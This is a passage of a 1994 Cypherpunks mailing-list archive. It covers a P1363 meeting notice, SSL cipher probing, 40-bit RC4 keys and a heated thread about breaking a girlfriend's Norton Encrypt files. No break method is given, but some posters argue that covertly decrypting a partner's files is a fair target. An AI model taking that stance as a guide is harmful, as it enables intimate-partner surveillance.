discussion of crypto system -- RSA, PGP similarity and difference.] "Netscape Communications may not be able to clean out the loose threads and cobwebs of the Internet, but its client and servers are the kinds of products the Internet needs to make the transition from being a cobweb of experimental projects to a serious commercial marketplace." From eric at remailer.net Thu Dec 22 09:54:31 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 22 Dec 94 09:54:31 PST Subject: MEETING NOTICE: IEEE RSA/Diffie-Hellman Working Group Message-ID: <199412221851.KAA18678@largo.remailer.net> The following is the notice for the IEEE P1363 working group. The official title includes RSA and Diffie-Hellman, but these two algorithms are on hold because of patent issues. The committee is going forward on elliptic curve systems. Here's how this committee works. The working group is composed of individuals, not representatives of companies. Anybody can show up and participate. The voting rules are as follows. If you've shown up at two of the last three meetings, you can vote. That's it. The next meeting is typically set at the current one. The meetings are held in conjunction with various security conferences, typically, to make it easier for everyone to attend. The last two meetings were at CRYPTO in mid August in Santa Barbara, CA and at the Fairfax, VA security conference in early November. The next one will be possibly at the Oakland, CA conference held in May at the Claremont Hotel. I'd urge all interested parties to make an effort to attend. Eric ----------------------------------------------------------------------------- Date: Wed, 21 Dec 94 11:35:47 PST From: burt at RSA.COM (Burt Kaliski) To: p1363 at RSA.COM Subject: MEETING NOTICE: IEEE RSA/Diffie-Hellman Working Group IEEE P1363: Standard for RSA, Diffie-Hellman and Related Public-Key Cryptography MEETING NOTICE Thursday, January 12, 1995, 9:00-4:00pm Hotel Sofitel, Redwood Shores, California This fifth meeting of the P1363 working group, open to the public, will review draft sections of a standard for RSA, Diffie-Hellman and related public-key cryptography. The meeting follows the 1995 RSA Data Security Conference, held January 9-11 at the same location. AGENDA 1. Approval of Agenda 2. Approval of Minutes from November Meeting 3. Officers' Reports 4. Review of Draft Standard a. General material b. Elliptic curves c. Hardware support d. Random number generation 5. Proposals for New Sections 6. New Work Assignments 7. Meeting Schedule If you'd like to participate, contact Burt Kaliski, the working group's chair, at RSA Laboratories, 100 Marine Parkway, Redwood City, CA 94065. Phone: (415) 595-7703, FAX: (415) 595-4126, E-mail: . Draft sections and copies of previous minutes are available via anonymous ftp to rsa.com in the "pub/p1363" directory. The working group's electronic mailing list is ; to join, send e-mail to . There is no meeting fee this time. Hotel Sofitel is at 223 Twin Dolphin Drive in Redwood Shores, California, about 12 miles south of San Francisco International Airport. From U.S. 101, take the Redwood Shores Parkway exit, and turn left at the second traffic light. Phone: (415) 598-9000. From rarachel at prism.poly.edu Thu Dec 22 09:58:40 1994 From: rarachel at prism.poly.edu (Arsen Ray Arachelian) Date: Thu, 22 Dec 94 09:58:40 PST Subject: Name that phone In-Reply-To: Message-ID: <9412221743.AA07856@prism.poly.edu> How about VGP? (Very Good Phone) or VGPP (Very Good Private Phone) From bart at netcom.com Thu Dec 22 10:23:09 1994 From: bart at netcom.com (Harry Bartholomew) Date: Thu, 22 Dec 94 10:23:09 PST Subject: Merry Cryptmas Message-ID: <199412221820.KAA09257@netcom11.netcom.com> For the holidays I recommend Tim's latest essay, available from ftp.netcom.com:/pub/tc/tcmay/Anarchy for your reading pleasure. This is a reasoned, balanced presentation that will surely propagate the memes of cypherpunk interest to the broader public. Pass it on. From skaplin at skypoint.com Thu Dec 22 10:57:16 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Thu, 22 Dec 94 10:57:16 PST Subject: alpha.c2.org software upgrade In-Reply-To: <9412220301.AA20375@toad.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <9412220301.AA20375 at toad.com>, you wrote: > It is now possible to send outgoing mail via the alias remailer at > alpha.c2.org. To send a message, create a message of the following > format: > > From: me at alpha.c2.org (My Nym) > Password: mypass > Subject: test > To: alt.test at demon.co.uk > > This is my message. > > Encrypt this with the public key for the remailer and send it to > alias at alpha.c2.org. It will decrypt it and send your message > (after verifying and removing the password line.) Can you please provide details on obtaining a password and the remailer's public key. Thanks, Sam ============================================================================== Marriage is like a cage; one sees the birds outside desperate to get in, and those inside equally desperate to get out. - Michel Eyquem de Montaigne ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvnKY8lnXxBRSgfNAQGK2gf9HFMNKe64xk/YdTYdiG5DHGDvgcZI4U8I hCDsNF93piGOS4zDf4z1qNI/aWlyc2km6tUGOzIOqyrl9NPu7Wdm4by80wHTJXEp wWq7CpO/Gks8YS2O4j6uy2KehmUGbPXohB+o1XknzjG84uXoLqAZuO634MZKu9W8 Qc6hx8bHjtV/ogbeuxtyjd3V39uHza61stNmNM/Ls5KK3VOYDqb61g0g3qa3k5wn bo5mnxkWAhgjGrRNhWY4X/L6m8i011/ExWMneBmrtkFSlXaqr0mWA8rv89gU8Mue d3dc6fuCrm+qNIBs4ZUv8tR2hzjHyx6w4/fZJAssjuPy880xYPdnUA== =rIrc -----END PGP SIGNATURE----- From kipp at warp.mcom.com Thu Dec 22 10:59:14 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Thu, 22 Dec 94 10:59:14 PST Subject: SSL server experiment Message-ID: <9412221854.AA10294@warp.mcom.com> In article <199412200623.WAA11611 at jobe.shell.portal.com>, you write: > Here is a perl script which connects to a netscape-style "https" server. > The results of running it with "https.pl home1.mcom.com 443" is: > > Attempting connection to 198.93.93.10 > Connected > Sent message, length 40 > Received length = 502 > Message type = 4 > Session ID Hit flag = 0 > Certificate type = 1 > Server version = 2 > Certificate length = 472 > Cipher specs length = 3 > Conn ID length = 16 > Supported ciphers: > RC4_EXPORT40, 128 bits > > This way you can see which of the 5 cipher options (RC4 or RC2 in full > and export versions, plus IDEA) are supported by any given server. You > always use port 443 and just specify the machine name. I was a > little surprised that Netscape's own server is only running the 40 bit > version. I hope the export restrictions will not prevent the use of > full strength ciphers. Cool! The 1.1 version of server&client will support 128 bit stuff...The 128 bit client will not be available for ftp though...bloody export laws --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From jburrell at crl.com Thu Dec 22 11:09:38 1994 From: jburrell at crl.com (Jason Burrell) Date: Thu, 22 Dec 94 11:09:38 PST Subject: Making sure a program gets to the receiver intact In-Reply-To: <9412220711.AA21268@anon.penet.fi> Message-ID: On Thu, 22 Dec 1994 an169306 at anon.penet.fi wrote: > 2: Someone breaking into my apt, sticking a keyboard monitor on, getting > my passphrase and key. I'm quite concerned about that myself. Is there a way to tell if your computer has been tampered with? Assume that looking at the case doesn't do much good (they get by that easy), and if they want to hide the bug they can. Voltage monitoring? > Pardon the anonymous ID, as my reputation with my REAL user id is not > so great. (No, I am not Lance, but not that better off due to tons > of dumb mistakes with my regular ID on this list.) Ah. Glad you put in the "No, I'm not Lance" part. I was wondering when I read that paragraph. :) From Tony.Gurnick at nzdairy.co.nz Thu Dec 22 11:18:49 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Thu, 22 Dec 94 11:18:49 PST Subject: Kiwi cypherpunks & other things Message-ID: <94122308083203@nzdairy.co.nz> All, I am going on holiday for 3 weeks so will be unsubing from the list for a while. Can you email me directly about kiwi cpunks? and other stuff. A listserv @ cybernet would be a good thing. We could have our own NZ kiwi cypherpunks mailing list! Oh, what we would talk about! :) Oh, Thanks to all who helped me with the 2048 bit keys. I thought it was the 15-dec-94! Anyway I changed the source a bit so now I can generate 16384 bit keys. On the other hand trying to gen a 2048 bit key with this modified code just failed so maybe I`ll have to wait!!! (shiiit!) I cant set the clock on our machines. T From lcottrell at popmail.ucsd.edu Thu Dec 22 12:07:56 1994 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Thu, 22 Dec 94 12:07:56 PST Subject: Making sure a program gets to the receiver intact Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >On Thu, 22 Dec 1994 an169306 at anon.penet.fi wrote: >> 2: Someone breaking into my apt, sticking a keyboard monitor on, getting >> my passphrase and key. > >I'm quite concerned about that myself. Is there a way to tell if your >computer has been tampered with? Assume that looking at the case doesn't >do much good (they get by that easy), and if they want to hide the bug >they can. Voltage monitoring? You might consider putting the computer in a strong ventilated metal box, and using some kind of wax or lead seal. It is unlikely that any black bag team would have the right tools to cover any traces of tampering. > >> Pardon the anonymous ID, as my reputation with my REAL user id is not >> so great. (No, I am not Lance, but not that better off due to tons >> of dumb mistakes with my regular ID on this list.) > >Ah. Glad you put in the "No, I'm not Lance" part. I was wondering when I >read that paragraph. :) Hey! hey! Nothing wrong with the name Lance. It is all a matter of the LAST name. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLvncF1Vkk3dax7hlAQG3EAP+LzjBc9VucFREojyDztb29axVs8pYVbwf 5Xz3IzITYLAjgjb9fIj/PQvxQwn9CE3tRAJ3wMh08bzJqJlZqHryRVR+gErtC5Yt 4Y4N1SWZq+UUwhHAS9cxoWkYkqvEI/h3eAaLHN9Ukd3y9IGdk0V9YZ3Opm7aZbny nEaMan16FQc= =ngYK -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From kipp at warp.mcom.com Thu Dec 22 13:54:17 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Thu, 22 Dec 94 13:54:17 PST Subject: Time to exhaustively break 40-bit RC4? In-Reply-To: <199412122330.PAA29185@netcom20.netcom.com> Message-ID: <9412221345.ZM12940@warp.mcom.com> On Dec 17, 1:49pm, Hal wrote: > Subject: Re: Time to exhaustively break 40-bit RC4? > I notice in the Netscape SSL spec the 40-bit export-approved RC4 > key generation is a little more complicated than I would have thought. > First a 128 bit "master key" is chosen and 88 bits are revealed, leaving > 40 bits secret. Then the RC4 session key is generated as the MD5 hash of > this master key plus about 32 bytes of publically known but random > information. I'm not clear whether the 128-bit output of the MD5 hash is > then used as the RC4 key, or whether only 40 bits are used (and if so, > whether there are any public bits in the key besides these 40). 128 bits are used. I have cleaned up the spec language to make this more obvious. > If the former, then this extra hash step should really slow down > exhaustive search of the key space. If the latter, then it is not clear > why the master key is key-size restricted at all since it is not likely > to be used in searching the key space. Maybe someone from Netscape could > clear up how this is done. Hopefully it will slow down exhaustive key search. Hope this helps, and thanks again for the comments. -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From dave at esi.COM.AU Thu Dec 22 15:57:55 1994 From: dave at esi.COM.AU (Dave Horsfall) Date: Thu, 22 Dec 94 15:57:55 PST Subject: Is it possible to break Norton Encrypt?? In-Reply-To: <941222003135.20215af5@SCSUD.CTSTATEU.EDU> Message-ID: On Thu, 22 Dec 1994, ADAM GERSTEIN, _THE_ MACGURU wrote: > A friend of mine thinks his girlfriend has been cheating on him, and > thinks the proof may be in a few Norton Encrypt files. Is there anyway > to get the password with a data/resource editor, or is he > shit-out-of-luck and looking for a new girl-friend? Boy; talk about an inappropriate use of technology... Is "privacy" in that guy's vocabulary? I respectfully submit that if he has to start snooping on her, the relationship is over anyway. -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From lmccarth at thor.cs.umass.edu Thu Dec 22 16:45:30 1994 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Thu, 22 Dec 94 16:45:30 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: <199412230045.TAA21904@thor.cs.umass.edu> Dave Horsfall writes: > ADAM GERSTEIN, _THE_ MACGURU writes: > > A friend of mine thinks his girlfriend has been cheating on him, and > > thinks the proof may be in a few Norton Encrypt files. Is there anyway > > to get the password with a data/resource editor, or is he shit-out-of-luck > Boy; talk about an inappropriate use of technology... Is "privacy" > in that guy's vocabulary? I respectfully submit that if he has to > start snooping on her, the relationship is over anyway. My sentiments exactly. Whether or not she's two-timing, I imagine she'd be pretty upset (and justifiably so) if she knew her boyfriend wants to break into her private documents. He should *ask* her straight out to confirm or deny his suspicions. If he doesn't like the answer, he should get out. Someone needs to give her PGP ASAP, IMHO.... -L. Futplex McCarthy From nesta at nesta.pr.mcs.net Thu Dec 22 17:16:21 1994 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Thu, 22 Dec 94 17:16:21 PST Subject: Chicago/MidWest Cypherpunks In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu> Message-ID: I have recntly moved to Chicago, and was wondering if there was a regional branch of the Cypherpunks in this area. If so is there a meeting scheduled soon? **I've got the strap-on connections in Lesbos, and the KY trust in Sodom, I'm the only Man in Istanbul, I'm the only punk in Islam, I'm the only bar on Skid Row, I'm the only whore on the waterfront** _Cobble Stone Gardens_ William Seward Burroughs From werewolf at io.org Thu Dec 22 19:24:27 1994 From: werewolf at io.org (Mark Terka) Date: Thu, 22 Dec 94 19:24:27 PST Subject: Breaking into girlfriend's files In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199412230045.TAA21904 at thor.cs.umass.edu>, "L. McCarthy" wrote: >Dave Horsfall writes: >> ADAM GERSTEIN, _THE_ MACGURU writes: >> > A friend of mine thinks his girlfriend has been cheating on him, and >> > thinks the proof may be in a few Norton Encrypt files. Is there anyway >> > to get the password with a data/resource editor, or is he shit-out-of-luck >> Boy; talk about an inappropriate use of technology... Is "privacy" >> in that guy's vocabulary? I respectfully submit that if he has to >> start snooping on her, the relationship is over anyway. GROAN! What the hell is this list about anyway?????? I think we are losing perspective about encryption, privacy etc etc... Putting it quite simply, the individual was asking about how to make an attack on an opponent. Whether that opponent is a girlfriend, spouse, competitor or terrorist group, who cares? Lets save the sermonizing for Ann Landers...what state the relationship is irrelevant. The gentleman asked a question regarding a standard cryptographic problem... how you can intercept and interpret encrypted information, either in theory in practice. To make judgement calls is WAY out of line and a hell of a bad precedent for this group. I bet the poster would have gotten a more sympathetic response if he said he had gotton his hands on a diplomatic cable.... > >My sentiments exactly. Whether or not she's two-timing, I imagine she'd be >pretty upset (and justifiably so) if she knew her boyfriend wants to break >into her private documents. He should *ask* her straight out to confirm or >deny his suspicions. If he doesn't like the answer, he should get out. Oh boy! Pretty soon we will have this list as "cypherpunks giving advice to the lovelorn..."!!! Lets cut the crap, stick to the problem at hand and offer solutions to what the participants of the list know best, namely the the use and analysis of cryptographic problems. Save the relationship bullshit for Masters and Johnson.... > >Someone needs to give her PGP ASAP, IMHO.... Sure, from a disspassionate point of view, I agree. But I thought that the whole point of this list was the promotion of PGP and the discussion of the pro's and con's of encryption in general. That should include attacking as well as defense. Since, how can you rationally discuss defense unless you know what kind of attack your opponents can mount against you??????? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLvo+sHBFBj7pSNyhAQEj8Qf/Yk+avezO8+bQw1vFBFht/STmhmHbXuVL qtWiJhHdCJigsUyVAGWMgCBhZE6eWHgD0DylhIHywVK2Y2VvI0A6Vi1/Bk+rkviw F2AFLJwV+td2yvoEVWCRL4kQlW7RLAuiYdJ2Vlb0Kw2Q8EkuxOcLiYXYAE/c6LTf DNXc9238IbMoL+hbUzA3xkPL/S7LriRcNW9nzeCYHLt0SSkEn9mxd8c120jRz0aL F33i7Fgnuy3OM5QUORxv78bjfzo6jBTXzW02ikp7YwtbDYv+RCt8b7dwmdJDHoV+ LtJ+qOV3pNk6UBUXMqeTig5Azi9NtVyh8MmhCozC0BaVuOxodcjkRA== =VPdb -----END PGP SIGNATURE----- From unicorn at access.digex.net Thu Dec 22 19:43:02 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Thu, 22 Dec 94 19:43:02 PST Subject: Breaking into girlfriend's files In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu> Message-ID: On Thu, 22 Dec 1994, L. McCarthy wrote: > Date: Thu, 22 Dec 1994 19:45:17 -0500 (EST) > From: L. McCarthy > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > Dave Horsfall writes: > > ADAM GERSTEIN, _THE_ MACGURU writes: > > > A friend of mine thinks his girlfriend has been cheating on him, and > > > thinks the proof may be in a few Norton Encrypt files. Is there anyway > > > to get the password with a data/resource editor, or is he shit-out-of-luck > > Boy; talk about an inappropriate use of technology... Is "privacy" > > in that guy's vocabulary? I respectfully submit that if he has to > > start snooping on her, the relationship is over anyway. > > My sentiments exactly. Whether or not she's two-timing, I imagine she'd be > pretty upset (and justifiably so) if she knew her boyfriend wants to break > into her private documents. He should *ask* her straight out to confirm or > deny his suspicions. If he doesn't like the answer, he should get out. > > Someone needs to give her PGP ASAP, IMHO.... > > -L. Futplex McCarthy > As darwinian as it seems, perhaps someone should just tell the guy how to bust Norton's encryption, eh? Since when are cypherpunks relationship counslers? If she gets burned using norton encrypt, perhaps she'll take the time to learn about real encryption. (I assume Norton's is trash) Short term privacy loss perhaps, but long term gain. If it were to be otherwise, I guess we all better stop posting crypto weaknesses at all, afterall, who knows what girlfriend will next be violated if we tell joe hacker how to break e.g., enigma. While everyone is at it, why not just subscribe wholeheartedly to the security through obscurity doctrine...? The more I think about the above, the more I wonder if those on the list have conflicting goals, that is, absolute privacy by agreement. Are we really that naive? If so, why develop crypto at all? -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From ianf at sydney.sgi.com Thu Dec 22 20:07:48 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Thu, 22 Dec 94 20:07:48 PST Subject: Breaking into girlfriend's files In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu> Message-ID: <9412231452.ZM19768@wiley.sydney.sgi.com> On Dec 22, 9:46pm, Mark Terka wrote: > GROAN! What the hell is this list about anyway?????? I think we are losing > perspective about encryption, privacy etc etc... > Putting it quite simply, the individual was asking about how to make an attack > on an opponent. Whether that opponent is a girlfriend, spouse, competitor or > terrorist group, who cares? Lets save the sermonizing for Ann Landers...what > state the relationship is irrelevant. What a load of amoral rubbish. Cypherpunks is a group whose members believe in the application of technology to PROTECT privacy, not to violate someone else's. Once you assume that capability implies right, you're on very shakey moral ground, but that is exactly what you are saying in this post. I find that position repellent, and I would be very surprised and not a little disappointed if you find many others here who felt the same way. > I bet the poster would have gotten a more sympathetic response if he said he > had gotton his hands on a diplomatic cable.... Possibly. IMO, what the original requester was asking for was so repulsive and immature that the responses so far have been mild. Ian. From dave at esi.COM.AU Thu Dec 22 20:39:01 1994 From: dave at esi.COM.AU (Dave Horsfall) Date: Thu, 22 Dec 94 20:39:01 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Thu, 22 Dec 1994, Mark Terka wrote: > GROAN! What the hell is this list about anyway?????? I think we are losing > perspective about encryption, privacy etc etc... ^^^^^^^ You said it. > Putting it quite simply, the individual was asking about how to make an attack > on an opponent. Whether that opponent is a girlfriend, spouse, competitor or > terrorist group, who cares? Lets save the sermonizing for Ann Landers...what > state the relationship is irrelevant. And *HE* gave the reason - he wanted go rifling through his girlfriend's private files. And here I was, thinking that this list was about "better privacy through cryptography" - I must have subscribed to alt.2600 by mistake... Come to think of it, that's a better place for the original query... > The gentleman asked a question regarding a standard cryptographic problem... > how you can intercept and interpret encrypted information, either in theory > in practice. To make judgement calls is WAY out of line and a hell of a bad > precedent for this group. Read it again - he specifically wanted to sneak into his partner's files; that is a clear invasion of privacy. Jeeze - I thought a Yank would have understood this... > I bet the poster would have gotten a more sympathetic response if he said he > had gotton his hands on a diplomatic cable.... And would you have been just as sympathetic if somebody wanted to rifle YOUR files? > Oh boy! Pretty soon we will have this list as "cypherpunks giving advice to > the lovelorn..."!!! Lets cut the crap, stick to the problem at hand and > offer solutions to what the participants of the list know best, namely the > the use and analysis of cryptographic problems. That has nothing to do with it - person A wanted advice on how to invade person B's privacy (he presumably doesn't have the guts to just ask her). Sorry, but privacy works both ways - she's entitled to it just as much as anybody else. -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From lmccarth at thor.cs.umass.edu Thu Dec 22 20:49:53 1994 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Thu, 22 Dec 94 20:49:53 PST Subject: Breaking into girlfriend's files Message-ID: <199412230455.XAA07179@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Black Unicorn writes: > If she gets burned using norton encrypt, perhaps she'll take the time to > learn about real encryption. (I assume Norton's is trash) > Short term privacy loss perhaps, but long term gain. This sounds to me rather like saying: "If the American public gets burned by accepting Skipjack as the crypto standard, perhaps they'll take the time to learn about real encryption." I prefer the version where the American public doesn't get burned in the first place. If Clipper has to be adopted before the public will learn about real encryption, why are we bothering to try to promote it now ? Shouldn't we be backing Clipper wholeheartedly, to teach 'em a lesson ? [...] > The more I think about the above, the more I wonder if those on the list > have conflicting goals, that is, absolute privacy by agreement. Are we > really that naive? I have ideals, yes. My deepest condolences if you don't have any. - -L. Futplex McCarthy - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvpYDyoZzwIn1bdtAQFfsAF+I9d0c12vWtLp+be+ybiP7X9obidXqIBQ nnb5PkMVZYrms7gcJXgwBCH2irGzQrQ3 =Ssqh -----END PGP SIGNATURE----- From blancw at pylon.com Thu Dec 22 20:59:51 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Thu, 22 Dec 94 20:59:51 PST Subject: Breaking into girlfriend's files Message-ID: <199412230500.VAA03390@deepthought.pylon.com> Snappy comeback to msg by Mark Terka: "GROAN! What the hell is this list about anyway?????? I think we are losing perspective about encryption, privacy etc etc... >From the 'Welcome' message for new subscribers to the list: "Cypherpunks will make the networks safe for privacy." It doesn't say "Cypherpunks will make it possible to mount crypto invasions against your opponents." "To make judgement calls is WAY out of line and a hell of a bad precedent for this group." Yes, it's bad precedent, seeing as how everyone on the list is unoriginal, followers who are likely to take any ideas presented as incentive to act, as sanctioned by the members. Everyone knows that, that's why the list is always so quiet. .. Blanc From werewolf at io.org Thu Dec 22 23:06:38 1994 From: werewolf at io.org (Mark Terka) Date: Thu, 22 Dec 94 23:06:38 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article , Dave Horsfall wrote: >On Thu, 22 Dec 1994, Mark Terka wrote: > >> GROAN! What the hell is this list about anyway?????? I think we are losing >> perspective about encryption, privacy etc etc... > ^^^^^^^ >You said it. And the defense thereof..... > >> Putting it quite simply, the individual was asking about how to make an attack >> on an opponent. Whether that opponent is a girlfriend, spouse, competitor or >> terrorist group, who cares? Lets save the sermonizing for Ann Landers...what >> state the relationship is irrelevant. > >And *HE* gave the reason - he wanted go rifling through his girlfriend's >private files. And here I was, thinking that this list was about "better >privacy through cryptography" - I must have subscribed to alt.2600 by >mistake... Come to think of it, that's a better place for the original >query... Gee...I guess we shouldn't get too concerned when gov't agencies try to break OUR communications on a large scale ...or maybe the cypherpunk system of remailers were set up just as a hobby... > >> The gentleman asked a question regarding a standard cryptographic problem... >> how you can intercept and interpret encrypted information, either in theory >> in practice. To make judgement calls is WAY out of line and a hell of a bad >> precedent for this group. > >Read it again - he specifically wanted to sneak into his partner's files; >that is a clear invasion of privacy. Jeeze - I thought a Yank would have >understood this... Sorry....I'm Canadian......and sure. He wanted to sneak into his partners files. What a strange cryptographic concept that happens to be.... > >> I bet the poster would have gotten a more sympathetic response if he said he >> had gotton his hands on a diplomatic cable.... > >And would you have been just as sympathetic if somebody wanted to rifle >YOUR files? Yup! Alls fair in luv...or WAR! If you aren't prepared to play the game, then stay at home!! > >> Oh boy! Pretty soon we will have this list as "cypherpunks giving advice to >> the lovelorn..."!!! Lets cut the crap, stick to the problem at hand and >> offer solutions to what the participants of the list know best, namely the >> the use and analysis of cryptographic problems. > >That has nothing to do with it - person A wanted advice on how to invade >person B's privacy (he presumably doesn't have the guts to just ask her). >Sorry, but privacy works both ways - she's entitled to it just as much >as anybody else. Just like the Japanese were entitled to THEIR privacy before Midway, eh? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLvpySnBFBj7pSNyhAQG+9wf/XJP/KiXtPidMOka+sMWHPQMY8jMPwqML TEubTnBmzb97zjefBCigrygmJZS6IatJKyf9sBtFHxHy7JBvbuzCBywT5d7xzQ65 D/7Ms50gCwZ50SWx2TFm9xfnbUBpYsmuRwWKn2yu+JZZu+vg7nOuPAhBVgg6RF3m LyxHkpoQ+SvtJHsyqYXL4lEkkdJ3hLSjMEsHcJBUaIaYWaO++By3J6Nmsv3J4K/k DwHFEDssuMjpKqIYdStJ+mGQ13dyB9yn73gTD5cvwhdNn3IrG96IdGQeIGECT+Bv Z8mNB2urLuHKe6Gipdf//OsXlerFxYlPbHsJiRUYu0Qc0cokhTlIlw== =f8M4 -----END PGP SIGNATURE----- From werewolf at io.org Thu Dec 22 23:06:39 1994 From: werewolf at io.org (Mark Terka) Date: Thu, 22 Dec 94 23:06:39 PST Subject: Breaking into girlfriend's files In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <9412231452.ZM19768 at wiley.sydney.sgi.com>, you wrote: >On Dec 22, 9:46pm, Mark Terka wrote: >> GROAN! What the hell is this list about anyway?????? I think we are losing >> perspective about encryption, privacy etc etc... > >> Putting it quite simply, the individual was asking about how to make an >attack >> on an opponent. Whether that opponent is a girlfriend, spouse, competitor or >> terrorist group, who cares? Lets save the sermonizing for Ann Landers...what >> state the relationship is irrelevant. > >What a load of amoral rubbish. Oh goody! Now we are getting a judgement call with respect to how cryptography in general aids "the greater good". Do you suppose the NSA makes the same call when they do routine traffic analysis or try to bust a suspiciously (to them) encrypted message?????? > >Cypherpunks is a group whose members believe in the application of >technology to PROTECT privacy, not to violate someone else's. Ummmm...excuse me...."the cypherpunks are an informal group of people interested in teaching and learning about cryptography. They also experiment with cryptography and try to put it into use" from Applied Cryptography by Bruce Schnier....pg 445. That to me indicates that the members of this list should be at least remotely interested in the subject of attacks as well as defense as you can't defend aginst something unless the method of attack has been discussed. >Once you assume that capability implies right, you're on very >shakey moral ground, but that is exactly what you are saying in this >post. I find that position repellent, and I would be very surprised >and not a little disappointed if you find many others here who felt >the same way. GROAN! (again) And how, pray tell, do we go about protecting ourselves against others if we are not prepared to discuss what sort of attacks may be mounted against us????? Like I alluded to before, I bet if it was a case of someone trying to descramble something like skipjack to try and discover something about National Security (ours OR theirs) I bet the members of this list would have fallen all over themselves trying to help the original poster. I don't recall seeing too much in the waqy of condemnation of the guy that posted RC4 to this list ..... but as soon as we see something that touches close to home like male/female relationships, the shit hits the fan!!!!! > >> I bet the poster would have gotten a more sympathetic response if he said he >> had gotton his hands on a diplomatic cable.... > >Possibly. IMO, what the original requester was asking for was so >repulsive and immature that the responses so far have been mild. And in my opinion what the original poster was no different than the British attack on "Enigma" or the American attack on "Purple". -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLvpu/HBFBj7pSNyhAQEHggf+M2p7VvvJB+Aoy1/r1bCiEN7gPzlY7CeZ Ykgwcg/v0ZP/ivJGOpkyeWnboz/Jj5AXGtnK3+BMCzsTbrgH6zs3OU555gQN9oGW BtYESXz4n2H5hOucKix9qUKlkf7NkooD6q2k3s+Cof9v4F7214W5Ae6cVXW5F2Dx jVVGyh1/e/WdgHrV5857lwfGNdF6a2TJSNtsOnargd1v2+eZifZmGocf7fnSq+4L rjj7qsTiyl9JkUKhSjh64W3Ay1wEk8GnlcON7m4J2u57pcBU8JDhoBiXjIA0uqAi 6pYE1k/05su6gvm9GcgDgVv5W76VfSFvXHA2jQ4HLjhp6O3IQJqtZw== =FYQy -----END PGP SIGNATURE----- From werewolf at io.org Thu Dec 22 23:06:40 1994 From: werewolf at io.org (Mark Terka) Date: Thu, 22 Dec 94 23:06:40 PST Subject: Breaking into girlfriend's files In-Reply-To: <199412230455.XAA07179@bb.hks.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199412230455.XAA07179 at bb.hks.net>, you wrote: >> The more I think about the above, the more I wonder if those on the list >> have conflicting goals, that is, absolute privacy by agreement. Are we >> really that naive? > >I have ideals, yes. My deepest condolences if you don't have any. Like the agencies we worry the most about.....? FBI...CIA...NSA...etc??? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLvp0jXBFBj7pSNyhAQG0Ogf+Llx7QyvbzT1lgjmvBdIUBptlWKx/ULOh xo1kh12llj9+vyaIXiUKiiSsbdI+UbWIM4bBv+aV7z2qq/90TAt46+A+adXUDKDq eQEIcgl8J3B5DDoRPphr/Py5EAxMNuAgV2CId+gSIBUulb2O3yDWyy48+Dqs2UuS xFPchCghOuzedPUCjzfJBH4N4DUmAGS82npFGQUJPLo+jG25y7BhxyxAz4KoNF7o 